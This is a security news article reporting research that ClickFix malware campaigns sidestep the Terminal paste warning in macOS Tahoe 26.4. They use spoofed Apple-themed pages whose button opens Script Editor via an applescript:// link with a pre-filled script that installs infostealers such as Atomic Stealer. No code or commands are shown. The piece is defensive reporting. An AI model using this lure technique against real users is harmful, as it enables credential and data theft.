Apple's Terminal paste warning in macOS Tahoe 26.4 is already being circumvented by ClickFix malware authors who've shifted to using Script Editor instead.
Apple's latest security measure to combat malware on macOS has been circumvented by attackers within weeks of its release. The Terminal paste warning introduced in macOS Tahoe 26.4, designed to disrupt ClickFix attacks, is already being bypassed by malware authors who have shifted their tactics to use Script Editor instead.
The evolution of ClickFix attacks
ClickFix isn't a malware family itself but rather a delivery technique that relies heavily on social engineering. The method typically tricks users into pasting malicious code into Terminal and executing it. Its popularity surged in 2025 following Apple's release of macOS Sequoia, which made it significantly harder for malware to bypass Gatekeeper protections.
Before Sequoia, users could simply right-click to override Gatekeeper and open unsigned or unnotarized software. The new process required navigating to Settings > Privacy and reviewing security information before running such software. This additional friction made fake DMG installers much less effective for malware distribution.
ClickFix emerged as a preferred alternative because it's inexpensive, fast, and bypasses Gatekeeper without requiring a signing certificate. The technique's effectiveness led Apple to implement the Terminal paste warning in Tahoe 26.4 as a countermeasure.
How the new bypass works
According to researchers at Jamf Threat Labs, the latest ClickFix variant completely sidesteps the Terminal paste warning by avoiding Terminal altogether. Instead of prompting users to paste commands into Terminal, the new approach uses a fake Apple-themed webpage that appears to offer legitimate functionality.
One example documented by Jamf shows a spoofed page titled "Reclaim disk space on your Mac" featuring an "Execute" button. When clicked, this button triggers an applescript:// URL scheme in the browser, which prompts the user to open Script Editor with a pre-filled script already loaded.
)
)
Because the malicious command never passes through Terminal, Apple's new paste warning in macOS Tahoe 26.4 never activates. While Script Editor does present its own "unidentified developer" prompt before saving the script, users who click through this warning allow the script to execute.
Once executed, the script downloads an obfuscated curl command and installs the latest variant of infostealers or trojans like Atomic Stealer onto the infected Mac.
The ongoing security arms race
The rapid emergence of this bypass highlights the continuous back-and-forth between Apple's security measures and malware authors' adaptations. What makes ClickFix particularly challenging is its reliance on social engineering rather than technical exploits, making it difficult for Apple to block without significantly impacting legitimate user workflows.
For users, this underscores the importance of remaining vigilant when encountering unexpected prompts or websites offering system optimization tools. The fact that these attacks can now be initiated with just a couple of clicks makes them especially dangerous for less technically-savvy users who might not recognize the social engineering tactics at play.
The security community will be watching closely to see how Apple responds to this latest bypass, as the company has consistently demonstrated its commitment to improving macOS security in the face of evolving threats.
Comments
Please log in or register to join the discussion